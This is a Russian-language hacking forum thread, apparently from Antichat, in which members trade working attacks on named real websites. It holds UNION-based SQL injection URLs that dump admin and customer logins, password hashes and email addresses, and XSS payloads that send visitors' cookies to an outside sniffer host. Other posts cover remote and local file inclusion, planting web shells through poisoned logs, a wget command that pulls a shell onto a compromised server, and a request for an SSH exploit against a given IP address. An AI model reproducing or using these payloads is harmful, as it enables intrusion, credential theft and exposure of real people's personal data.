П.С.- с удовольствием возьму уроки(естессно не бесплатно) у знающего дело профессионала , который мне всё разжуёт ! Спасибо за внимание. Не судите строго.

хм...
на роль "знающего профессионала" я не претемндую, но все же выскажу парочку своих соображений:

1. во-первых, (хотя это дело вкуса) посмотрел бы движок сайта. что-то мне подсказывает, что там должна быть скуль (SQL-inj).
http://portal.kurkino.net.ru/portal.php?module=news&view_gid=4'
Про скули почитай в этой же ветке форума.

2. во-вторых, сайтец построен как минимум на двух движках:
- движок сайта - смотри в самом низу страницы: Portal System ULN-Web. Зная PHP и имея на руках исходные его коды можно самому найти уязвимость в двиге. Как вариант - пошерстить по багтракам - мож уязвимость там уже нашли.
- движок форума - см. выше.
А вот для изучения исходников тебе понадобится выучить PHP. На ачате для этого материалов предостаточно.

И вообще, как вариант, можешь, опять же на форуме просто попросить взломать сайт =)

удачи...

m0use, ты видишь все таблицы SQL, там же будут и от форума.
UPDATE имя_таблицы SET поле=значение

Пассивный XSS
http://www.poetryclub.com.ua/author.php?id=3873'%22%3E%3C/script%3E'%22%3E%3Cscript%3Ealert(document.coockie )%3C/script%3E
--
не подскажите почему не работает мой скрипт? мой скрипт -document.location.href="http://www.poetryclub.com.ua/author.php?id=3873'%22%3E%3C/script%3E%27%22%3E%3Cscript%20%73%72%63%3D%68%74%7 4%70%3A//%78%78%73%2D%78%78%73%2E%6E%6D%2E%72%75%2F%6A%73%2 E%6A%73%3E%20%3C/script%3E%0D%0A"; по сути это document.location.href="http://www.poetryclub.com.ua/author.php?id=3873'"></script>'"><script src=http://xxs-xxs.nm.ru/js.js> </script>";
а в оригенале http://www.poetryclub.com.ua/author.php?id=3873'"></script>'"><script>alert(document.coockie)</script>>";
xxs-xxs.nm.ru/js.js - там <script> img = new Image(); img.src="http://s.netsec.ru/Onex.gif?"+document.cookie;</script> Помогите плиз разобраться =(
И еще вопрос.. если тырю куки с zzz.ru то и дыра должна быть в zzz.ru ? Спасибо

bobob, возможно таблицы находятся в других базах. Узнай базу таблицы:

... , concat(table_name,0x3a,table_schema), ... +from+information_schema.tables

а потом пиши имя базы перед именем таблицы

... ,password, ... +from+имя_базы.users/*


А возможно просто нету доступа к этим таблицам :\

Типа такого

script.php?id=-1+union+select+1,2,password,4+from+used.used_users/*

bobob, ты читал мануалы по инъекциям ? )) Перечитай )))

Допустим у тебя есть таблица calendarusers. Тебе нужно узнать в какой БД она находится. Для этого пишешь запрос

script.php?id=-1+union+select+1,2,table_schema,4+from+information _schema.tables+where+table_name='calendarusers'/*

Допустим в ответ вывело - firstbd. Тогда составляешь запрос

script.php?id=-1+union+select+1,2,concat_ws(0x2F,login,password), 4+from+firstbd.calendarusers/*

Теперь делай по аналогии

m0use, ты видишь все таблицы SQL, там же будут и от форума.
Втом то и дело что некоторые таблицы я вижу а именно таблиц форума я не нашел.
UPDATE имя_таблицы SET поле=значение
как это в брайзере должно выглядеть, методом тыка уже пробовал и UNION добавлял и без него... поэтому и спрашиваю как правильно!?

Уязвим ли следующий код php:

if(!isset($_POST['adminusr'])) $_POST['adminusr']='';
if(!isset($_POST['adminpwd'])) $_POST['adminpwd']='';
if ($_POST['adminusr']==$admin_usr and $_POST['adminpwd']==$admin_pwd) {echo "зашли!";}
else {echo "идём лесом";}

При условии что спецсимволы не экранируются, т.е magic_quotes_gpc = 0?

Втом то и дело что некоторые таблицы я вижу а именно таблиц форума я не нашел.

А ты пробовал использовать limit?

как это в брайзере должно выглядеть, методом тыка уже пробовал и UNION добавлял и без него... поэтому и спрашиваю как правильно!?

Запросы типа UPDATE работают крайне редко! Такая фишка с изменением базы не катит!

народ, может кто знает уъязвимость на укозе, хсс там или еще что, срочно надо, искал не нашел =(

Я вот нашел пхп инклуд вот здесь: http://www.dorodango-method.com/index.php а когда пробую залить шелл http://www.dorodango-method.com/index.php?page=http://mysite.ru/shell.php
Шел отображается нормально, но файлы отображаются те которые у меня на сайте, и команды тоже выполняются относительно моего сайта.. В чем трабл?

WeddRRRyss там нет инклуда

Когда я пытаюсь внедрить свой код в активный xss(работает скрипт) " и ' фильтруются. Когда ввожу скрипт со сниффом в 16 системе, то скрипт не выполняется. Что не так?

У меня есть полный доступ к FTP одного сайта, я там покавырялся и нашел админку на сайте, путь выглядит так _www.site.ru/AdminSite/start.php , (вот скрин админки (http://img91.imageshack.us/img91/1365/63386099fs5.jpg) ) потом я там в FTP поискал пароли, и в той папке где админка AdminSite есть еще папка tc и там есть файл config.php открыл я этот .php файл вот сам код

<?
//Файл: config.php
//Назначение: хранение настраиваемых переменных
//===========================================

error_reporting(0);

//Начальный хост (адрес начальной папки через HTTP,
//например: "http://mysite.ru" или "http:/pupkin.ru/home")
$host_1 = "http://site.ru".$HTTP_HOST;

//Начальная директория
$path_1 = $DOCUMENT_ROOT;

//Имя пользоввателя (надо поменять!)
$login_1 = "site";

//Пароль для входа в программу (надо поменять!)
$pass_1 = "****";

//Количество файлов, доступных для загрузки на сервер
//(четное число, например: 4, 6, 8 ...)
$files_to_upload = 10;

?>


Ну короче видите там где login и pass


//Имя пользоввателя (надо поменять!)
$login_1 = "site";

//Пароль для входа в программу (надо поменять!)
$pass_1 = "****";


Ввел тут _www.site.ru/AdminSite/start.php как там в config.php логин и пароль и не заходит, менял в config.php логин и пароль токо не фига, может это вообще логин и пароль не от админки? Просто я решил если они находятся в одной папке что это оно)

Спасибо за внимание

Если не в том разделе сорри :) (но кажется тот)

Токо не пинайте pls, если я не понятно обяснил напишите) просто хочу дойти до конца :)

не очень понятно зачем нужна админка если есть доступ к ftp а так вообще исходник start.php не судьба посмотреть?

не очень понятно зачем нужна админка если есть доступ к ftp а так вообще исходник start.php не судьба посмотреть?
start.php я смотрел там ничего нету), все мне говорят зачем нуна админка если есть доступ к фтп, )

Ответ: просто для себя хочу узнать) новые знания пригодятся)

Мало ли IP привязан к Админу смотри лучше должны же пассы где-то быть не с неба же упали))) ИЩИ!

Мало ли IP привязан к Админу смотри лучше должны же пассы где-то быть не с неба же упали))) ИЩИ!
Вводил пассы от MySQL базы тоже нифига)

Я первый раз занимаюсь SQL инекцией :)
Вот подскажите это SQL инекция или нет? По моему да, токо хочу узнать на 100% :)

http://brownberets.info/wp-content/plugins/wp-cal/functions/editevent.php? id=-1%20union%20select%201,concat(user_login,0x3a,user _pass,0x3a,user_email), 3,4,5,6%20from%20wp_users--


и там вот это потом написано

Edit event admin:cd59cc41aa03d53c9336522d40ee4339:bradley@ris eup.net

cd59cc41aa03d53c9336522d40ee4339 это кажется MD5, если я не ошибаюсь)

Это моя первая тема про SQL так что не пинайте)

Спасибо за внимание

CaNNabi$, да инъекция ))) Можешь юзать лимит, что бы посмотреть инфу по остальным юзерам

http://brownberets.info/wp-content/plugins/wp-cal/functions/editevent.php?id=-1+union+select+1,concat(user_login,0x3a,user_pass, 0x3a,user_email),3,4,5,6+from+wp_users+limit+1,1--

CaNNabi$, да инъекция ))) Можешь юзать лимит, что бы посмотреть инфу по остальным юзерам

http://brownberets.info/wp-content/plugins/wp-cal/functions/editevent.php?id=-1+union+select+1,concat(user_login,0x3a,user_pass, 0x3a,user_email),3,4,5,6+from+wp_users+limit+1,1--

Спасибо что подсказал, наконец то сбылась моя мечта, я так рад ппц как) давно хотел узнать хотел сделать SQL инекцию, ааа ништяк)
Терь моно в раздел SQL инекций добавлять)

А вот это нуно рашифровать cd59cc41aa03d53c9336522d40ee4339 и я получу пароль от админки? Или как?)

Повторяю я новичок в этом деле :)

угу, от админки ворд пресса

у меня такая ситуация:
index.php?d=files&p=../index
инклудится индекс. Видно, что добавляется .php в конец.
index.php?d=files&p=../index.php%00
index.php?d=files&p=../index.php?
index.php?d=files&p=../index.php//
не прокатывает! Ошибку выдёт. Там Винда стоит.
Есть ли шанс приишклудить файл с другим расширением, отличным от php?

скорее всего нет, ибо magic_quotes или просто фильр стоит, попробуй объявить переменную через куки или постом, хотя навряд ли прокатит

http://www.site.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*

и выводится вот такой вид хешёй немогу понять что это именно мд5 или всё таки соль?

Weinstein:425207c6e60ffa47065702619d9a8e76:aa:happ iquilter@verizon.net

Fisher:6ab6348c5cb2b47c1afdb254d23f6717:f2:bizzybe adz@gmail.com

425207c6e60ffa47065702619d9a8e76:aa
это md5($pass.$sault), брутил PasswordPro, сбрутил тока 2 пасса =/

это md5($pass.$sault)

точно ты уверен ?

Сбруть этот: 72baa9d520b127dd4ab03ff904cc1959:e5 и поймешь =)
хотя опять же 100% уверенности всё же дать не могу

Может кто-нибудь все-таки подскажет: Когда я пытаюсь внедрить свой код в активный xss(работает скрипт) " и ' фильтруются. Когда ввожу скрипт со сниффом в 16 системе, то скрипт не выполняется. Что не так?

Fuckel, изъяснись понятней и с примером.

вообщем, xss выполняется, но " и ' фильтруются, то есть перед ними ставится /. Но перевожу скрипт в форму hex, то скрипт не выполняется, тоесть он просто выводит его на странице. Может это из-за браузера? Без примера, тк не хочу расппространятся.

вообщем, xss выполняется, но " и ' фильтруются, то есть перед ними ставится /. Но перевожу скрипт в форму hex, то скрипт не выполняется, тоесть он просто выводит его на странице. Может это из-за браузера? Без примера, тк не хочу расппространятся.
<script src=script.js></script>

вообщем, xss выполняется, но " и ' фильтруются, то есть перед ними ставится /. Но перевожу скрипт в форму hex, то скрипт не выполняется, тоесть он просто выводит его на странице. Может это из-за браузера? Без примера, тк не хочу расппространятся.
попробуй обратный апостроф `some text`

установил снифер на нэтсек.ру...как сделать, чтобы через ссылку печеньки на него шли?и вобще это возможно?напишите примерный вид ссылки

-slow-,
Сначала найди xss'ку на нужном тебе сайте
А потом ссылка вида:
www.site.ru/index.php?id=<script>img=new Image();img.src="http://www.s.netsec.ru/pic.gif?"+document.cookie;</script>

все таки без него нельзя....а что должно вывести, если есть узвимость, когда я поле проверяю на нее

<script>img = new Image(); img.src = "http://s.netsec.ru/yo.gif?"+document.cookie;</script>

ребя та, есть шелл на сайте такого вида: <? system($_get[cmd]) ?> но там лиункс стоит. какой коммандой мне закачать нормальный шелл? права на записть есть

wget хттп://нормальный_шелл.пхп -o куда_сохранить

HELP!!!!!!!! :eek: :eek: Я добыл брутом пароль.Через Putty почему-то его не могу ввести. Признаюсь я в хаке полнейший ламос. Как не через Putty ввести пароль? Помогите!!!

Пароль к чему ты добыл? К ssh?

Народ, очень интересует- можно узнать с помощью лимита имена колонок типа юзер пассворд в базе таблице? Таблицы узнал,а подобрать пассы не могу =((((подобрал только ид и имя юзера))

Народ, очень интересует- можно узнать с помощью лимита имена колонок типа юзер пассворд в базе таблице? Таблицы узнал,а подобрать пассы не могу =((((подобрал только ид и имя юзера))
Причём тут лимит? Лимит всего лишь ограничивает/распределяет вывод данных. Если версия базы ниже пятой (насколько я догадался мускуль), то смотри форму авторизации. Значения name, 80% что совпадут с названием колонок.

http://www.sitecom/showcategory.php?cid=7+union+select+0,column_name, 2,3,4+from+site_users.columns+/*

Доступа через селект туда нету,к information_schema.tables есть.

Просмотрел имена таблиц через лимит,напарываюсь на site_users.Там почти 5к юзеров. Подобрал user_id и username, а пароли никак )(.

Форму авторизации не нашёл,только админку =(

http://www.sitecom/showcategory.php?cid=7+union+select+0,column_name, 2,3,4+from+site_users.columns+/*

Доступа через селект туда нету,к information_schema.tables есть.

Просмотрел имена таблиц через лимит,напарываюсь на site_users.Там почти 5к юзеров. Подобрал user_id и username, а пароли никак )(.
Кто тебя учил таким запросам? Купи книгу по sql
select column_name from information_schema.columns where table_name = blablabla limit 1,1

http://housefind.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt, 7,8,9,10+from+runcms_users+where+uid=2

Эммм...ктонить может объяснить по порядку,как оно сделано о_О ? А то я нириально туплю(первый раз ваапще такое встречаю):Р.Как в таком случае узнать кол.-во строк и таблиц? ) (Можно подробно).Когда я ордер пробую он выдаёт предупреждение )(

Кто тебя учил таким запросам? Купи книгу по sql
select column_name from information_schema.columns where table_name = blablabla limit 1,1

Тот вариант тоже прокатывал, ток я почему-то не угадал user_password, ибо к мускулу доступа не было)(

Извените за банальный тупой вопрос по пхп инклюдингу. прочол статью по этой теме на античате

вот нашол плохую фильтрацию
http://www.dosuga.net/index.php?type=pic&seq=dfdsfds&mk=on&num=4&tot=92
(уязвима переменная seq)

пробывал подставить в переменную сайт

http://www.dosuga.net/index.php?type=pic&seq=http://www.google.ru&mk=on&num=4&tot=92
ноль эмоций

пробывал разработать как локальный инклюд
http://www.dosuga.net/index.php?type=pic&seq=../index.php&mk=on&num=4&tot=92

тоже ничего
подскажите в чом я ошибся и как разрабатывать эту уязвимость?

ошибся ты в том, что тут возможен бы был локальный инклюд, если бы не было экранирования спец символов типа кавычки и нуля, причем как я понял там еще и фильтрация какая то написана, хотя насчет фильтрации хз, но экранирование не дает провести локальный инклюд

Подскажите пожалуйста, есть какая нибудь прога для подстановки чисел в SQL инъекций, ну а точнее ВОТ (http://forum.antichat.ru/thread19605.html) прочитал я эту статью, и там написано

Способ №1: Зачастую проверяют на Mysql inj подстановкой в переменную одинарной ковычки: http://www.site.ru/index.php?page=1' Результатом, сведетельствующем о уязвимости должно быть сообщение на странице, что то вроде: MySQL Error: mysql_query(.......) error expretion syntax... Вобщем нечто подобное свидетельствует уже о 99% уязвимости ресурса.
Ну вот есть прога для атоматической подстановки чисел?) Я много раз читал эту статью, токо вот с подстановкой не выходит, )
Вручную чтоли делать?)

А эти шаблоны уже заепали) и вправду самому надо думать, а не готовыми инъекциями)

Ну вот такой у меня вопрос, может не внимательно я смотрел на ачате, может есть такая прога?)

Sql injection tool by SQLHACK может быть?

http://topofgames.com/index.php?cat_id=72'

Подставил какое-то значение не помню,вывело ашиппку.Стоит фильтрация на кавычку.Вместо неё куча обратных слешей:РР

http://www.dotfiles.com/index.php?cat_id=-6+order+by+1/*

Дыра есь,но как обойти хз:РР

http://www.nlstar.com/catalog/index.php?cat_id=17'+union+select+1,2,LOAD_FILE('/var/www/vhosts/nlstar.net/req/class.db.php')+from+mysql.user/*
код выпадет в исходник

всегда смотри file_priv, дальше советую поискать какие нибудь конфиги или исходники авторизации

гага,до мя щас ток дошло че делать))))))))).Пасиб те! )если б все так отвечали Ж...

шотто я ниче не вижу....там где написано Каталог Продукции Nl есь какой-то кусок кода,и усё:Р Можно чутка поподробней? А то я нуп Ж(

Исходный код страницы посмотри. там и будет исходника файла

_http://62.140.233.125/wow2/index.php?n=account/create
Может кто-нить подскажет двиг или баги в нем?

есть сайт с инекцией
http://wgem.com/Community/event.php?ID=5014'
если через group by подбирать колличество то получается 8
http://wgem.com/Community/event.php?ID=5014+group+by+8
А когда начинаю писать
http://wgem.com/Community/event.php?ID=5014+union+select+1,2,3,4,5,6,7,8/*
выдает что их не 8... что не так?

Просто там этот id используется в двух запросах к разным таблицам, а посему тут слепая инъекция

m0use кури more than 1 row от Elekt'а , там реально все сделать.
Ветка там 4, таблица users, колонки: id,username,password

m0use кури more than 1 row от Elekt'а , там реально все сделать.
Ветка там 4, таблица users, колонки: id,username,password

да, можно конечно, но это сложнее для понимания чем например
http://wgem.com/Community/event.php?ID=-5014/**/or/**/1=1/*

class DBMysql {

var $Connected;

var $Connection;

function DBMysql($connection_string) {
$this->Connected = FALSE;
$pattern = '/^([\w\d]+):([^\s]*)@([.\w\d]+);([\w\d]+)$/';
$matches = array();
if ( preg_match($pattern, $connection_string, $matches) != 0 ) {
array_shift($matches);
list($username, $password, $host, $database) = $matches;
if ( $c = @mysql_connect($host, $username, $password) ) {
if ( @mysql_select_db($database, $c) ) {
$this->Connected = TRUE;
$this->Connection = $c;
$this->Query("SET NAMES cp1251");
}
}
}
return($this->Connected);
}

function Close() {
@mysql_close($this->Connection);
$this->Connected = FALSE;
}

function Query($query) {
$args = func_get_args();

if ( sizeof($args)-1 != substr_count($query, '?') ) trigger_error('Wrong arguments count<br>' . $query, E_USER_ERROR);
$sql = "";
$q = 1;
while ( ($pos = strpos($query, '?')) !== FALSE ) {
$l = $query[$pos-1];
$r = $query[$pos+1];
if ( $l == $r ) {
switch ($l) {
case '"':
$args[$q] = str_replace('"', '\"', $args[$q]);
break;
case '\'':
$args[$q] = str_replace('\'', '\\\'', $args[$q]);
break;
case '`':
$args[$q] = preg_replace('/[^a-zA-Z0-9_]/', '' , $args[$q]);
break;
}
}
else if ( !is_numeric($args[$q]) )
$args[$q] = '\'' . str_replace('\'', '\\\'', $args[$q]) . '\'';

$sql .= substr($query, 0, $pos) . $args[$q];
$query = substr($query, $pos+1, strlen($query)-$pos);
$q++;
}
$sql .= $query;

// echo $sql . '<hr>';
$result = mysql_query($sql, $this->Connection) or trigger_error('<b>Ошибка SQL запроса:</b> ' . $sql . '<br />' . mysql_error(), E_USER_ERROR);
return($result);
}

function Fetch($result) {
$row = @mysql_fetch_array($result);
return($row);
}

function FetchQuery($query) {
$args = func_get_args();
$result = call_user_func_array(array(&$this, 'Query'), $args);
$row = $this->Fetch($result);
return($row);
}

function FetchAll($result) {
$r = array();
while ( $row = $this->Fetch($result) ) $r[] = $row;
return($r);
}

function NumRows($result) {
$n = @mysql_num_rows($result);
return($n);
}

function IsEmpty($result) {
$result = ( $this->NumRows($result) == 0 ) ? TRUE : FALSE;
return($result);
}

function LastInsertID() {
return(mysql_insert_id($this->Connection));
}
}

$dbtable = array();
foreach (explode(',', $tablenames) as $tablename) {
$tablename = trim($tablename);
$dbtable[$tablename] = $db_prefix . $tablename;
}

$db = new DBMysql($DB_CONNECTION_STRING);
?>

Просмотрел,поискал,не понял:Р Что там должно быть такое,что меня так сильно интересует )))))

а хз чё тебе надо

плиз, подскажите, есть для этого SSH-1.99-OpenSSH_3.9p1 сплойт
сервак висит под этим ip 65.98.230.4

http://forum.antichat.ru/showpost.php?p=591791&postcount=4841

kair
http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=OpenSSH+3.9p1&x=0&y=0
http://search.securityfocus.com/swsearch?query=SSH+1.99&sbm=%2F&submit=Search%21&metaname=alldoc&sort=swishrank

Ох не знал я, что поисковики отменили.

m0use кури more than 1 row от Elekt'а , там реально все сделать.
Ветка там 4, таблица users, колонки: id,username,password

А поподробней можно? что за more than 1 row от Elekt'а?

http://forum.antichat.ru/threadnav35207-1-10.html

а хз чё тебе надо


написали смотреть в исходник- смотрю :Р.там лоад фаил пахал,я и просмотрел исходник.

http://www.mebel24.ru/shopinfo.php?id=-22+union+select+0,table_name,2,3,4,5,6,7,8,9,10,11 +from+information_schema.tables/*

что не подставляю, возвращает ошибку с mysql_num_rows(),версию базу и т.д узнать почемуто можно)(

Велемир я тебе сказал искать конфиги или исходники авторизации админки. Путь у тебя есть, собрать до нужного файла легко

http://www.mebel24.ru/shopinfo.php?id=-22+union+select+0,version(),2,3,4,5,6,7,8,9,10,11/*

откдуа ты там схему запрашиваешь, ветка старая, информатион_схема только с 5ой ветке

Версия mysql 4.1.22, там нету базы information_schema

Сорь...не знал,*пошёл дальше рыскать*

Ну чтож почти научился SQL инекций) вот токо у меня не получается вывеси логин с хэшем вот например это портал нашего провайдреа :D

http://*********/portal.php?module=news&view_gid=0x3127%20union+select+1,2,3,4,concat_ws(0 x2F,version(),database(),user()),6,7,8/*
Ну это покажет версию, базу и имя, вот я подставлял потом такое значение


http://*********/portal.php?module=news&view_gid=0x3127%20union+select+1,2,3,4,user,passwo rd,6,7,8+from+mysql.user/*

Токо не пошло, можете обяснить что подставить надо? :) Статьи прочитал подставлял не полуличось, либо я не понял)

CaNNabi$
union select 1,2,3,4,user,6,7,8 from mysql.user/*
либо так
union select 1,2,3,4,concat_ws(0x3a,user,password),6,7,8 from mysql.user/*

CaNNabi$
union select 1,2,3,4,user,6,7,8 from mysql.user/*
либо так
union select 1,2,3,4,concat_ws(0x3a,user,password),6,7,8 from mysql.user/*
Спасибо)

Это сработает, если есть доступ к бд mysql, если его нет - проходим лесом))

Invalid Query: select * from item where item_id = -256 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34/* && inactive = 'N' Error is: You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,2' at line 2

Выдало ошибку, после того как я подобрал количество столбцов:

http://www.site.com/product.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34/*

Всё прально ведь,а выдал ошибку (

линку довай

http://www.brunton.com/product.php?id=-256+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34/*

http://www.brunton.com/product.php?id=256%20and%20substring(version(),1,1 )=3
там мускул третий, в нем нет конструкции union select

ых, кто бы мог подумать)

Ж)))ы откуад ты это взял всякие енд:РРР. Лан пасибо всем :Р

Чет я не фкурил, а где там версия отображается?))

Велемир, ну ты жжешь, она и не должна отображаться просто если выражение substring(version(),1,1 )=3 правильное, то отображается страница http://www.brunton.com/product.php?id=256 , а если нет, то страница не отобразится, попробуй
http://www.brunton.com/product.php?id=256%20and%20substring(version(),1,1 )=4
http://www.brunton.com/product.php?id=256%20and%20substring(version(),1,1 )=5

Откуда мне знать-то,впервые вижу такое )).С какой статьи взял?:Р

Warning: mysql_connect() [function.mysql-connect]: User 'u70382875' has exceeded the 'max_user_connections' resource (current value: 5) in /mnt/w0605/d00/s33/b027a354/www/eipcprograms.com/includes/include.php on line 104

Warning: mysql_query() [function.mysql-query]: in /mnt/w0605/d00/s33/b027a354/www/eipcprograms.com/product.php on line 10

Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /mnt/w0605/d00/s33/b027a354/www/eipcprograms.com/product.php on line 10
There has been an error in the database (queryDatabase; SELECT * FROM EIPC_PRODUCT WHERE ID=-16 union select 1,gangsta,3,4,5,6,7,8,9,10,11,12,13*; ;)

Ваще жесть)))).Только только дошёл до таблицы,и вылетела ошибка.Не совсем понял,че произошло,разъясните ктонить:Р

Сорь,нашёл статью по работе с третьей весии скуля,щас примемся за обучение:Р

http://www.eipcprograms.com/product.php?id=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12 ,13+from+information_schema.tables+limit+1,1/*

Да вродь нет(

а ф топку этот сайт,помоему он ни на что не катит:РР.Одни ошибки и толком инче нету

User 'u70382875' has exceeded the 'max_user_connections'
Налетели блин :)

http://www.umpcportal.com/products/product.php?id=-161+order+by+2/*


Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/www.umpcportal.com/products/product.php on line 123

Хоть и знаю,что это такое,но всё равно, не даёт мне покоя,что мне делать,как мне быть,как мне эту хрень забыть(.А понт в том,что если вместо 2 подставить 1,то все ошибки чудесным образом пропадают)),через юнион ничерта не работает.Версия мускула четвёртая,знач юнион должен пахать,и значит скуля есть.Конструкицю ака /**/ пробывал.

www.umpcportal.com/products/product.php?id=-1+union+select+concat_ws(0x3a,version(),user(),dat abase())/*
4.0.24_Debian-10sarge2-log:carrypad@localhost:carrypadproducts

не понял, в чем у тебя проблема =\

http://www.umpcportal.com/products/product.php?id=-161%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37/*

Не пойму каким макаром ты подбирал,я через order by пробывал

Ищи табы, потом колонки.
Вот что нашел я:
http://www.umpcportal.com/products/product.php?id=-1+union+select+concat_ws(0x3a,id,name,status)+from +products/*

Как их искать,если не знаешь,какие(я про таблицы).

Не пойму каким макаром ты подбирал,я через order by пробывал

ОМГ,
http://www.umpcportal.com/products/product.php?id=-161+order+by+38/*
обрати внимание на ошибку вверху страницы

http://www.umpcportal.com/products/product.php?id=-161+order+by+37/*
обрати внимание, что ошибки нет

Да вот ща ток заметил,там хрен разберёшь- столько ошибок хоть убейсо:Р

У мя такое ощущение,что есть список таблиц этой версии,ибо сбрутить или догадаться самому это анриал =__________=

лол

есть просто списки как при бруте паса по словарю вот и все, а как назвать таблу - это дело владельца дб

эт всёравно что сказать - есть список всех пасов от инета

Гггг))))).Ясн,всем спасиб :РР

у меня вопрос: что можно сделать с локальным пхп-инклудом, если:
+инклуд лога я запарол, тепрь там ошибка (error.log и access.log, других там нет).
+загружать на сервер нифига нельзя.
+стоит винда, могу прочесть файлы WINDOWS\repair\sam и C:\WINDOWS\repair\system, но конечно же если их сохранять через страницу - расшифровать их неудастся - повредится структура.
+проверял файл тоталкоммандера - его там нет.
+БД там стоит ibase

Посоветуйте что-нить дельное. Благодарствую!

ты уверен, что там локальный инклюд? посмотри еслть ли возможность заливать какие нибудь файлы, картинки и т.п. например аватары залей тогда гифку со скриптом и попробуй ее проинклюдть

я же говорю, нихрена нельзя заливать. 100% локальный инклуд.
мот кто знает БД ibase в каком файле пароли хранятся? Щас поищу в инете этот серв, буду сам разбираться, но всерано оставляйте свои предложения.

И Ещё: как правильно в логи шелл записывать? У себя на окалхосте я писал <?system($_POST[cmd])?> и писалось, а на том сервере пришлось вопросики урл-закодировать, но что-то не прокатило (шелл был вида <?include("http://shell")?>? нужно было делать такой <?system($_POST[cmd])?>, но я уже запорол... (пост - потомучто инклуд, с параметрами гет, там почемуто не инклудит - еррор выдает))

ошібка такая:
Parse error: parse error, unexpected T_STRING in C:\Program Files\ХХХ\Apache\logs\error.log on line 45831

инклудь access.log, скрипт передавай в юзер-агенте. Если уже запорол, жди пока лог обнулится.

Всем хай !
У меня вопрос, могу ли я осуществить поиск по базе майскуль через инъекцию, например, есть скуль - http://site.ru/index.php?id=1'+union+select+1,2,3,4,5/*
Там крайне много таблиц с юзерами, мне нужна лишь одна из них, с авторизацией на главной паге, я зарегистрировался, и поставил, скажем пасс 123456, и хочу найти по базе таблицу в которой есть значение 123456, возможно ли это ?

Нет, насколько мне известно выборку/поиск можно осуществлять только зная таблицу. Т.к. человек не сможет перечислить все предметы что лежат в ящике, не открыв самого ящика. Да и такой извращенский запрос я представить не могу.

можно для 5-й версии по столбцу ,примерно так:
+union+select+table_name+from+information_schema.c olumns+where+column_name='password'/*
но надо знать столбец

jokester точно знать не надо, на случай если префикс у колонки
+union+select+table_name+from+information_schema.c olumns+where+column_name+like+%pas%/*

можно для 5-й версии по столбцу ,примерно так:
+union+select+table_name+from+information_schema.c olumns+where+column_name='password'/*
но надо знать столбец

Нет, японял о чем ты говоришь но это не то, .Slip правильно сказал в Information_schema нет информации о содержимом полей (что вполне логично) хотя еслиб для регулярок были бы такие функции как в php (ну там карманы и все такое, то мож и можно было ченить придумать, хотя не уверен) вобще меня что то смущает в этом, но это так скорее паранойя

согласен со всеми ,просто дополнял ответ .Slip он пишет "только зная таблицу"

jokester точно знать не надо, на случай если префикс у колонки
+union+select+table_name+from+information_schema.c olumns+where+column_name+like+%pas%/*
Как он выведет имя таблицы из таблицы с данными о колонках? Ведь данные из infotmation_schema.columns по сути своей считываются с выражением Where.

PS Или Constantin'у и jokester'у пора идти читать маны, или мне:)

Сайт http://www.faces.md/ сделан на PHP и использует MySQL но у меня мозги не шарят как найти уязвимость к коде или базе если в адресной строки ничего конкретного не отображается кроме http://www.faces.md/user/226955
Жду помощи

2 .Slip поверь это работает

.Slip я не отвечал на конкретно поставленный вопрос, просто подсказал джокстеру, что точно знать название колонки, для получения имени таблицы содержащий эту колонку не надо..
з\ы или тебя сама конструкция запроса смутила?

.Slip я не отвечал на конкретно поставленный вопрос, просто подсказал джокстеру, что точно знать название колонки, для получения имени таблицы содержащий эту колонку не надо..
з\ы или тебя сама конструкция запроса смутила?

Полностью согласен, это как в MSSQL или SYBASE в syscolumns есть информация о объектах которым принадлежат колонки (только там id объекта) а в мускуле именно имя таблицы

2 .Slip
можно даже имя базы оттуда вытащить
пример(бага старая найдена не мной)
_http://chaplains.harvard.edu/chaplains/profile.php?id=-1+union+select+1,2,3,concat(table_schema,char(58), table_name),5,6,7,8,9,10,11+from+information_schem a.columns+where+column_name=0x75736572+limit+1,1/*

Мм.. Дам-с, лоханулся я тут.

2 .Slip
можно даже имя базы оттуда вытащить
пример(бага старая найдена не мной)
_http://chaplains.harvard.edu/chaplains/profile.php?id=-1+union+select+1,2,3,concat(table_schema,char(58), table_name),5,6,7,8,9,10,11+from+information_schem a.columns+where+column_name=0x75736572+limit+1,1/*
Этот прием показывал Grey

разговор ни о чём
узнать имя таблицы по её содержимому нельзя, а дальше непонятная мне дискуссия про information_schema =\
PS онтечад

История оценок репутации для Spyder:
+3 Ваши вопросы по уязвимо... 18.02.2008 20:55 ZAMUT если мускул 5.х то можно

Вот покажи мне запрос который вернёт имя таблицы, при том что я не знаю имён колонок и у меня только одно значение 123456. Кто сказал что колонка с паролями имеет в своём имени "pas", мб она называется "paroli"
В таком случае запрос Константина
select+table_name+from+information_schema.c olumns+where+column_name+like+%pas%/*
работать не будет, и вообще это больше похоже на игру "угадай буквы в имени колонки".
Ответ на вопрос 0nep@t0p'a нет, Слип и Scipio правильно написали, узнать таблицу по её содержимому нельзя

Spyder, ну да только угадайка ..

http://www.newspress.fr/index.asp?lang=hfg'
собственно что енто уязвимость ? что из этого можно вообше можно выжать если вообше можно ? собственно с таким первый раз сталкиваюсь :(


собственно при подставлении в значение ленг сужествуюшего фаыла начинаеть материться под другому тока на французком :)

Это mssql инъекция
http://www.newspress.fr/index.asp?lang='+or+1=@@version--